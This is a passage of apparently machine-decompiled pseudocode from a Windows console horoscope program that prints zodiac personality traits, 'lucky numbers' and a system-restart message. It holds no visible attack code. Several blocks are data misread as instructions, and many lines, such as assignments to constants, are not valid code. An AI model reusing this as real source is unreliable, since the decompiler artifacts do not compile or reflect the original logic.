												__esp = 8 + __esp;
												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
												goto L60;
											case 1:
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__edx = __esi;
												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D16D0();
												__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
												goto L60;
											case 2:
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__edx = __esi;
												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D16D0();
												_push("------------------------------------------------------------------");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("------------------------------------------------------------------");
												 *0x13fe250 = 0x120005;
												E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v0;
												__eax = _v0 + _v0 * 2;
												_push(_v0 + _v0 * 2);
												_push("YOUR LUCKY NUMBERS ARE: %d\t");
												 *0x13fe250 = 0xe000a;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_v0 =  &(_v0[0]);
												_push( &(_v0[0]));
												_push("%d\t");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__ecx = _v0;
												__ecx = _v0 * 0x19;
												__eax = 0x6bca1af3;
												__edx = 0x6bca1af3 * __ecx >> 0x20;
												__eax = 0x6bca1af3 * __ecx;
												__edx = 0x6bca1af3 * __ecx >> 0x20 >> 3;
												__edx = __edx >> 0x1f;
												__eax = __edx + (__edx >> 0x1f);
												_push(__edx + (__edx >> 0x1f));
												_push("%d\t");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__ecx = _v0;
												__eax = 0x4ec4ec4f;
												__edx = 0x4ec4ec4f * __ecx >> 0x20;
												__eax = 0x4ec4ec4f * __ecx;
												__edx = 0x4ec4ec4f * __ecx >> 0x20 >> 2;
												__edx = __edx >> 0x1f;
												__edx + (__edx >> 0x1f) = __edx + (__edx >> 0x1f) + __ecx;
												_push(__edx + (__edx >> 0x1f) + __ecx);
												_push("%d\t");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("Enter any key to continue...");
												 *0x13fe250 = 0x160032;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__esp = 0x38 + __esp;
												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
												goto L60;
											case 3:
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__edx = __esi;
												E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ebx, __edi) = E013D16D0();
												__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
												__eax = __eax - 1;
												__eflags = __eax - 0xb;
												if(__eflags <= 0) {
													switch( *((intOrPtr*)(__eax * 4 +  &M013D3D04))) {
														case 0:
															goto L47;
														case 1:
															goto L48;
														case 2:
															goto L49;
														case 3:
															goto L50;
														case 4:
															goto L51;
														case 5:
															goto L52;
														case 6:
															goto L53;
														case 7:
															goto L54;
														case 8:
															goto L55;
														case 9:
															goto L56;
														case 0xa:
															goto L57;
														case 0xb:
															goto L58;
													}
												}
												goto L60;
											case 4:
												_push(E013DB07D());
												__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
												__esp = 4 + __esp;
												goto L60;
											case 5:
												_push(0);
												__al = __al + __ch;
												_pop(__ecx);
												 *__eax = __al;
												 *((intOrPtr*)(__ebx + 0x3d36b7ff)) =  *((intOrPtr*)(__ebx + 0x3d36b7ff)) + __cl;
												 *((intOrPtr*)(__edx - 0x38fec2c9)) =  *((intOrPtr*)(__edx - 0x38fec2c9)) + __esp;
												asm("aaa");
												__eflags = __eax - 0x3d389701;
												 *__edx = __edi +  *__edx;
												__eflags = __al - 0x3d;
												__ebx = __ebx + __esp;
												__eflags = __al - 0x3d;
												__eax = __eax + __ecx;
												__eflags =  *0x3d391201 - __bh;
												 *((intOrPtr*)( &(__edi[0xf]) + __ecx)) =  *((intOrPtr*)( &(__edi[0xf]) + __ecx)) + __ebx;
												 *((intOrPtr*)(__esi - 0xffec2c7)) =  *((intOrPtr*)(__esi - 0xffec2c7)) + __esp;
												__eflags =  *0x3d3a3a01 - __edi;
												 *((intOrPtr*)(__edx +  &(__edi[0xeb3804f]))) =  *((intOrPtr*)(__edx +  &(__edi[0xeb3804f]))) + __eax;
												__eflags = __eax - 0x3d3b1801;
												__edx[0xe] = __edx[0xe] + __esp;
												__eflags = __eax - 0x3d3bac01;
												__ebx = __esi + __ebx;
												__eflags = __edi -  *0xcccccc01;
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(__ebp);
												__ebp = __esp;
												__esp = __esp - 0x1c;
												_push(__ebx);
												_push(__esi);
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__esi = _v96;
												_push(__esi);
												_push("Name: %s");
												 *0x13fe250 = 0x30037;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__ebx = _v100;
												0x7da = 0x7da - __ebx;
												_push(0x7da);
												_push("Age=%d");
												 *0x13fe250 = 0x40037;
												_v128 = 0x7da - __ebx;
												E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v92;
												 *0x13fe250 = 0x50037;
												_v132 = _v92;
												_push(E013DC111(_v92));
												_push("Sex=%c");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__esp = 0x20 + __esp;
												__eax = E013D1760();
												_v140 = "\n*  You are easily hurt by the slights of others.";
												_v136 = "\n*  In your home life you usually go through a great deal of trouble.";
												__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
												__eax = __eax - 1;
												__eflags = __eax - 5;
												if(__eflags > 0) {
													L95:
													_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													__esp = 4 + __esp;
													__eax =  *0x13d0000();
													_pop(__esi);
													_pop(__ebx);
													return __eax;
												} else {
													_push(__edi);
													__edi = _v4;
													do {
														switch( *((intOrPtr*)(__eax * 4 +  &M013D4444))) {
															case 0:
																E013DB418(__ebx, __edx, __eflags, "cls") = _a8;
																__edx = __esi;
																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx) = E013D1760();
																_push("HERE IS WHAT YOU ARE!!!\n");
																 *0x13fe250 = 0x80001;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__esp = 0x10 + __esp;
																 *0x13fe250 = 0x90001;
																__eflags = __edi - 0xa;
																if(__edi <= 0xa) {
																	_v0 = __edi;
																	__eax = __edi;
																} else {
																	__eax = 0x66666667;
																	__edx = 0x66666667 * __edi >> 0x20;
																	__eax = 0x66666667 * __edi;
																	__edx = 0x66666667 * __edi >> 0x20 >> 2;
																	__eax = __edx + (__edx >> 0x1f);
																	__edx = __eax + __eax * 4;
																	__edx = __eax + __eax * 4 + __eax + __eax * 4;
																	__eax = __edi;
																	__eax = __edi - __edx;
																	_v0 = __eax;
																}
																__eflags = __eax;
																if(__eax == 0) {
																	_v0 = 5;
																	__eax = _v0;
																}
																_v16 = __eax;
																__eax = __eax + __eax;
																__eax = __eax + __eax;
																__eflags = __eax;
																__eax = __ebp + __eax - 0x20;
																_v24 = 1;
																_v20 = __eax;
																while(1) {
																	__eflags = _v16 - 0x25;
																	if(__eflags > 0) {
																		break;
																	}
																	__ecx = _v20;
																	__edx =  *_v20;
																	_push(__edx);
																	_push("\n\n%s");
																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																	_push("\nEnter any key....");
																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																	__esp = 0xc + __esp;
																	__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																	__ecx = _v0;
																	_v16 =  &(_v16[__ecx]);
																	__eax = _v24;
																	__ecx = __ecx + __ecx;
																	_v20 =  &(_v20[__ecx]);
																	__eax =  &(_v24[1]);
																	_v24 = __eax;
																	__eflags = __eax - 6;
																	if(__eflags < 0) {
																		continue;
																	}
																	break;
																}
																_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																_push("\n\n\n\n\nEnter any key.....");
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__esp = 8 + __esp;
																__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																goto L93;
															case 1:
																E013DB418(__ebx, __edx, __eflags, "cls") = _a8;
																__edx = __esi;
																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx) = E013D1760();
																__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																goto L93;
															case 2:
																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																__ecx = _a8;
																__edx = __esi;
																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx) = E013D1760();
																_push("------------------------------------------------------------------");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																_push("------------------------------------------------------------------");
																 *0x13fe250 = 0x100005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = __edi * 4;
																_push(__edx);
																_push("YOUR LUCKY NUMBERS ARE: %d\t");
																 *0x13fe250 = 0xc000a;
																E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) =  &(__edi[1]);
																_push( &(__edi[1]));
																_push("%d\t");
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__ecx = __edi;
																__ecx = __edi << 4;
																__eax = 0x38e38e39;
																__edx = 0x38e38e39 * __ecx >> 0x20;
																__eax = 0x38e38e39 * __ecx;
																__edx = 0x38e38e39 * __ecx >> 0x20 >> 1;
																__edx = __edx >> 0x1f;
																__ecx = __edx + (__edx >> 0x1f);
																_push(__edx + (__edx >> 0x1f));
																_push("%d\t");
																E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x66666667;
																__edx = 0x66666667 * __edi >> 0x20;
																__eax = 0x66666667 * __edi;
																__edx = 0x66666667 * __edi >> 0x20 >> 2;
																__eax = __edx + (__edx >> 0x1f);
																__edx = __eax + __eax * 4;
																__edx = __eax + __eax * 4 + __eax + __eax * 4;
																__edi = __edi - __edx;
																__eax = (__edi - __edx) * __edi;
																_push((__edi - __edx) * __edi);
																_push("%d\t");
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																_push("Enter any key to continue...");
																 *0x13fe250 = 0x160032;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__esp = 0x38 + __esp;
																__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																goto L93;
															case 3:
																E013DB418(__ebx, __edx, __eflags, "cls") = _a8;
																__edx = __esi;
																E013D1C00(__ebx, __esi, __edi, __esi, __eflags, _a8, __ebx) = E013D1760();
																__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																__eax = __eax - 1;
																__eflags = __eax - 0xb;
																if(__eflags <= 0) {
																	switch( *((intOrPtr*)(__eax * 4 +  &M013D445C))) {
																		case 0:
																			goto L80;
																		case 1:
																			goto L81;
																		case 2:
																			goto L82;
																		case 3:
																			goto L83;
																		case 4:
																			goto L84;
																		case 5:
																			goto L85;
																		case 6:
																			goto L86;
																		case 7:
																			goto L87;
																		case 8:
																			goto L88;
																		case 9:
																			goto L89;
																		case 0xa:
																			goto L90;
																		case 0xb:
																			goto L91;
																	}
																}
																goto L93;
															case 4:
																_push(E013DB07D());
																__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																__esp = 4 + __esp;
																E013D1000() = E013D1E40(__edi);
																goto L93;
															case 5:
																__eax = E013DC543(0);
																asm("fidivr word [0x3ec8013d]");
																__eflags = __eax - 0x3d3ef001;
																__esi = __esi + __eax;
																asm("aas");
																__eflags = __eax - 0x3d439001;
																 *((intOrPtr*)(__esp + __eax * 2)) =  *((intOrPtr*)(__esp + __eax * 2)) + __edi;
																__eflags = __eax - 0x3d3ffa01;
																__edi[0x10] = __edi[0x10] + __eax;
																__eflags = __eax - 0x3d409401;
																__ecx = __ecx + __esp;
																__eax = 1 + __eax;
																__eflags = __eax - 0x3d412e01;
																 *((intOrPtr*)(0x41 + __ebx)) =  *((intOrPtr*)(0x41 + __ebx)) + __edi;
																__eflags = __eax - 0x3d41c801;
																 *0x62013d42 =  *0x62013d42 + __edx;
																__edx =  &(__edx[0]);
																__eflags = __eax - 0x3d42af01;
																__esp = __edi + __esp;
																__edx =  &(__edx[0]);
																__eflags = __eax - 0x3d434601;
																__esp = __esp + __ecx;
																asm("int3");
																asm("int3");
																asm("int3");
																_push(__ebp);
																__ebp = __esp;
																__esp = __esp - 0x1c;
																_push(__ebx);
																_push(__edi);
																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																__edi = _v144;
																_push(__edi);
																_push("Name: %s");
																 *0x13fe250 = 0x30037;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__ebx = _v148;
																0x7da = 0x7da - __ebx;
																_push(0x7da);
																_push("Age=%d");
																 *0x13fe250 = 0x40037;
																_v176 = 0x7da - __ebx;
																E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v140;
																 *0x13fe250 = 0x50037;
																_v180 = _v140;
																_push(E013DC111(_v140));
																_push("Sex=%c");
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__esp = 0x20 + __esp;
																__eax = E013D17E0();
																_v188 = "\n*  You always aim to get above the common herd of humanity.";
																_v184 = "\n*  You are usually very patient and long-suffering, but if once roused, you know no fear.";
																__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																__eax = __eax - 1;
																__eflags = __eax - 5;
																if(__eflags > 0) {
																	L128:
																	_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																	__esp = 4 + __esp;
																	__eax =  *0x13d0000();
																	_pop(__edi);
																	_pop(__ebx);
																	return __eax;
																} else {
																	_push(__esi);
																	__esi = _v8;
																	do {
																		switch( *((intOrPtr*)(__eax * 4 +  &M013D4B98))) {
																			case 0:
																				E013DB418(__ebx, __edx, __eflags, "cls") = _a4;
																				__edx = __edi;
																				E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx) = E013D17E0();
																				_push("HERE IS WHAT YOU ARE!!!\n");
																				 *0x13fe250 = 0x80001;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__esp = 0x10 + __esp;
																				 *0x13fe250 = 0x90001;
																				__eflags = __esi - 0xa;
																				if(__esi <= 0xa) {
																					_v4 = __esi;
																					__eax = __esi;
																				} else {
																					__eax = 0x66666667;
																					__edx = 0x66666667 * __esi >> 0x20;
																					__eax = 0x66666667 * __esi;
																					__edx = 0x66666667 * __esi >> 0x20 >> 2;
																					__eax = __edx + (__edx >> 0x1f);
																					__edx = __eax + __eax * 4;
																					__edx = __eax + __eax * 4 + __eax + __eax * 4;
																					__eax = __esi;
																					__eax = __esi - __edx;
																					_v4 = __eax;
																				}
																				__eflags = __eax;
																				if(__eax == 0) {
																					_v4 = 5;
																					__eax = _v4;
																				}
																				_v20 = __eax;
																				__eax = __eax + __eax;
																				__eax = __eax + __eax;
																				__eflags = __eax;
																				__eax = __ebp + __eax - 0x20;
																				_v28 = 1;
																				_v24 = __eax;
																				while(1) {
																					__eflags = _v20 - 0x1f;
																					if(__eflags > 0) {
																						break;
																					}
																					__ecx = _v24;
																					__edx =  *_v24;
																					_push(__edx);
																					_push("\n\n%s");
																					__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																					_push("\nEnter any key....");
																					__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																					__esp = 0xc + __esp;
																					__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																					__ecx = _v4;
																					_v20 =  &(_v20[__ecx]);
																					__eax = _v28;
																					__ecx = __ecx + __ecx;
																					_v24 =  &(_v24[__ecx]);
																					__eax =  &(_v28[1]);
																					_v28 = __eax;
																					__eflags = __eax - 6;
																					if(__eflags < 0) {
																						continue;
																					}
																					break;
																				}
																				_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				_push("\n\n\n\n\nEnter any key.....");
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__esp = 8 + __esp;
																				__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																				goto L126;
																			case 1:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__eax = _a4;
																				__edx = __edi;
																				E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx) = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																				goto L126;
																			case 2:
																				__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																				__ecx = _a4;
																				__edx = __edi;
																				E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx) = E013D17E0();
																				_push("------------------------------------------------------------------");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				_push("------------------------------------------------------------------");
																				 *0x13fe250 = 0x100005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx =  &(__esi[__esi]);
																				_push(__edx);
																				_push("YOUR LUCKY NUMBERS ARE: %d\t");
																				 *0x13fe250 = 0xc000a;
																				E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __esi + __esi * 2;
																				__esi + __esi * 2 + __esi + __esi * 2 = __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2;
																				asm("cdq");
																				__edx = __edx & 0x00000007;
																				__edx + __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2 = __edx + __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2 >> 3;
																				_push(__edx + __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2 >> 3);
																				_push("%d\t");
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__esi * 8 = __esi * 8 - __esi;
																				__ecx = __esi * 8 - __esi + __esi * 8 - __esi;
																				__ecx = __esi * 8 - __esi + __esi * 8 - __esi + __esi * 8 - __esi + __esi * 8 - __esi;
																				__eax = 0x2aaaaaab;
																				__edx = 0x2aaaaaab * __ecx >> 0x20;
																				__eax = 0x2aaaaaab * __ecx;
																				__edx = 0x2aaaaaab * __ecx >> 0x20 >> 1;
																				__edx = __edx >> 0x1f;
																				__eax = __edx + (__edx >> 0x1f);
																				_push(__edx + (__edx >> 0x1f));
																				_push("%d\t");
																				E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x66666667;
																				__edx = 0x66666667 * __esi >> 0x20;
																				__eax = 0x66666667 * __esi;
																				__edx = 0x66666667 * __esi >> 0x20 >> 1;
																				__eax = __edx + (__edx >> 0x1f);
																				__ecx = __eax + __eax * 4;
																				__esi = __esi - __eax + __eax * 4;
																				__edx = (__esi - __eax + __eax * 4) * __esi;
																				_push(__edx);
																				_push("%d\t");
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				_push("Enter any key to continue...");
																				 *0x13fe250 = 0x160032;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__esp = 0x38 + __esp;
																				__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																				goto L126;
																			case 3:
																				__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																				__edx = _a4;
																				__edx = __edi;
																				E013D1C00(__ebx, __edi, __edi, __esi, __eflags, _a4, __ebx) = E013D17E0();
																				__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																				__eax = __eax - 1;
																				__eflags = __eax - 0xb;
																				if(__eflags <= 0) {
																					switch( *((intOrPtr*)(__eax * 4 +  &M013D4BB0))) {
																						case 0:
																							goto L113;
																						case 1:
																							goto L114;
																						case 2:
																							goto L115;
																						case 3:
																							goto L116;
																						case 4:
																							goto L117;
																						case 5:
																							goto L118;
																						case 6:
																							goto L119;
																						case 7:
																							goto L120;
																						case 8:
																							goto L121;
																						case 9:
																							goto L122;
																						case 0xa:
																							goto L123;
																						case 0xb:
																							goto L124;
																					}
																				}
																				goto L126;
																			case 4:
																				_push(E013DB07D());
																				__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																				__esp = 4 + __esp;
																				goto L126;
																			case 5:
																				__eax = E013DC543(0);
																				__ebp =  &_v15;
																				__eflags = __eax - 0x3d461801;
																				 *((intOrPtr*)(0x46 + __eax)) =  *((intOrPtr*)(0x46 + __eax)) + __eax;
																				__eflags = __eax - 0x3d472401;
																				__esi = __esi + __ebp;
																				__eflags = __esi;
																				asm("out dx, al");
																				__edx = __edx - 1;
																				__eflags = __eax - 0x3d4b9001;
																				 *((intOrPtr*)(0x47 + __eax)) =  *((intOrPtr*)(0x47 + __eax)) + __ebx;
																				__eflags = __eax - 0x3d47a501;
																				__edx = __edx + __esi;
																				__edi =  &(__edi[0]);
																				__eflags = __eax - 0x3d483f01;
																				 *((intOrPtr*)(__eax + 0x48d9013d + __ecx * 2)) =  *((intOrPtr*)(__eax + 0x48d9013d + __ecx * 2)) + __ecx;
																				__eflags = __eax - 0x3d492601;
																				 *((intOrPtr*)(0x49 + __ebx)) =  *((intOrPtr*)(0x49 + __ebx)) + __esi;
																				__eflags = __eax - 0x3d49c001;
																				 *0x5a013d4a =  *0x5a013d4a + __ecx;
																				__edx = __edx - 1;
																				__eflags = __eax - 0x3d4aa401;
																				_t350 =  &_v133;
																				 *_t350 = _v133 + __edx;
																				__eflags =  *_t350;
																				_push(__ebp);
																				__ebp = __esp;
																				__esp = __esp - 0x18;
																				_push(__ebx);
																				_push(__esi);
																				_push(__edi);
																				__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																				__esi = _v192;
																				_push(__esi);
																				_push("Name: %s");
																				 *0x13fe250 = 0x30037;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edi = _v196;
																				0x7da = 0x7da - __edi;
																				_push(0x7da);
																				_push("Age=%d");
																				 *0x13fe250 = 0x40037;
																				_v220 = 0x7da - __edi;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__ebx = _v188;
																				__eax = __bl;
																				 *0x13fe250 = 0x50037;
																				_push(E013DC111(__bl));
																				_push("Sex=%c");
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__esp = 0x20 + __esp;
																				__eax = E013D1850();
																				_v232 = "\nThe emblem of Virgo, a virgin holding sheaves of wheat in her hands symbolizes wisdom, garnered in the fields of experience.";
																				_v228 = "\n*  You are shy and idealistic.";
																				_v224 = "\n*  Disappointment can harden you into a cynic and a skeptic.";
																				__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																				__eax = __eax - 1;
																				__eflags = __eax - 5;
																				if(__eflags > 0) {
																					L161:
																					_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
																					__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																					__esp = 4 + __esp;
																					__eax =  *0x13d0000();
																					_pop(__edi);
																					_pop(__esi);
																					_pop(__ebx);
																					return __eax;
																				} else {
																					do {
																						switch( *((intOrPtr*)(__eax * 4 +  &M013D52C0))) {
																							case 0:
																								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																								__edx = __esi;
																								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D1850();
																								_push("HERE IS WHAT YOU ARE!!!\n");
																								 *0x13fe250 = 0x90001;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__ecx = _v12;
																								__esp = 0x10 + __esp;
																								 *0x13fe250 = 0xa0001;
																								__eflags = __ecx - 0xa;
																								if(__ecx <= 0xa) {
																									_v8 = __ecx;
																									__eax = __ecx;
																								} else {
																									__eax = 0x66666667;
																									__edx = 0x66666667 * __ecx >> 0x20;
																									__eax = 0x66666667 * __ecx;
																									__edx = 0x66666667 * __ecx >> 0x20 >> 2;
																									__eax = __edx + (__edx >> 0x1f);
																									__edx = __eax + __eax * 4;
																									__edx = __eax + __eax * 4 + __eax + __eax * 4;
																									__eax = __ecx;
																									__eax = __ecx - __edx;
																									_v8 = __eax;
																								}
																								__eflags = __eax;
																								if(__eax == 0) {
																									_v8 = 5;
																									__eax = _v8;
																								}
																								_v0 = __eax;
																								__eax = __eax + __eax;
																								__eax = __eax + __eax;
																								__eflags = __eax;
																								__eax = __ebp + __eax - 0x1c;
																								_v28 = 1;
																								_v24 = __eax;
																								while(1) {
																									__eflags = _v0 - 0x34;
																									if(__eflags > 0) {
																										break;
																									}
																									__ecx = _v24;
																									__edx =  *_v24;
																									_push(__edx);
																									_push("\n\n%s");
																									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																									_push("\nEnter any key....");
																									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																									__esp = 0xc + __esp;
																									__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																									__ecx = _v8;
																									_v0 = _v0 + __ecx;
																									__eax = _v28;
																									__ecx = __ecx + __ecx;
																									_v24 =  &(_v24[__ecx]);
																									__eax =  &(_v28[1]);
																									_v28 = __eax;
																									__eflags = __eax - 6;
																									if(__eflags < 0) {
																										continue;
																									}
																									break;
																								}
																								_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								_push("\n\n\n\n\nEnter any key.....");
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__esp = 8 + __esp;
																								__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																								goto L160;
																							case 1:
																								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																								__edx = __esi;
																								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D1850();
																								__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																								goto L160;
																							case 2:
																								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																								__edx = __esi;
																								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D1850();
																								_push("------------------------------------------------------------------");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								_push("------------------------------------------------------------------");
																								 *0x13fe250 = 0x120005;
																								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v12;
																								_v12 + _v12 * 2 = _v12 + _v12 * 2 + _v12 + _v12 * 2;
																								_push(_v12 + _v12 * 2 + _v12 + _v12 * 2);
																								_push("YOUR LUCKY NUMBERS ARE: %d\t");
																								 *0x13fe250 = 0xe000a;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								_v12 =  &(_v12[8]);
																								_push( &(_v12[8]));
																								_push("%d\t");
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__ecx = _v12;
																								__ecx = _v12 * 0x27;
																								__eax = 0x88888889;
																								__edx = 0x88888889 * __ecx >> 0x20;
																								__eax = 0x88888889 * __ecx;
																								__edx = (0x88888889 * __ecx >> 0x20) + __ecx;
																								__edx = (0x88888889 * __ecx >> 0x20) + __ecx >> 3;
																								__edx = __edx >> 0x1f;
																								__eax = __edx + (__edx >> 0x1f);
																								_push(__edx + (__edx >> 0x1f));
																								_push("%d\t");
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__ecx = _v12;
																								__eax = 0x66666667;
																								__edx = 0x66666667 * __ecx >> 0x20;
																								__eax = 0x66666667 * __ecx;
																								__edx = 0x66666667 * __ecx >> 0x20 >> 2;
																								__edx = __edx >> 0x1f;
																								__eax = __edx + (__edx >> 0x1f);
																								_push(__ecx);
																								_push("%d\t");
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								_push("Enter any key to continue...");
																								 *0x13fe250 = 0x160032;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__esp = 0x38 + __esp;
																								__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																								goto L160;
																							case 3:
																								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																								__edx = __esi;
																								E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ebx, __edi) = E013D1850();
																								__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																								__eax = __eax - 1;
																								__eflags = __eax - 0xb;
																								if(__eflags <= 0) {
																									switch( *((intOrPtr*)(__eax * 4 +  &M013D52D8))) {
																										case 0:
																											goto L147;
																										case 1:
																											goto L148;
																										case 2:
																											goto L149;
																										case 3:
																											goto L150;
																										case 4:
																											goto L151;
																										case 5:
																											goto L152;
																										case 6:
																											goto L153;
																										case 7:
																											goto L154;
																										case 8:
																											goto L155;
																										case 9:
																											goto L156;
																										case 0xa:
																											goto L157;
																										case 0xb:
																											goto L158;
																									}
																								}
																								goto L160;
																							case 4:
																								_push(E013DB07D());
																								__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																								__esp = 4 + __esp;
																								goto L160;
																							case 5:
																								__eax = E013DC543(0);
																								_t418 =  &(__edi[0]) + __ebp;
																								_t420 = __ecx;
